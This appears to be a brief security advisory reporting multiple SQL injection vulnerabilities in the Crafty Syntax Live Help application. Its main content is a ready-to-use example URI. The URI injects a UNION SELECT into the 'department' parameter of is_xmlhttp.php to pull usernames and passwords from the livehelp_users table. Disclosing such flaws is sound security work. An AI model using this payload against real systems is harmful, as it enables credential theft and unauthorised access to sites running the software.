Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities

Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*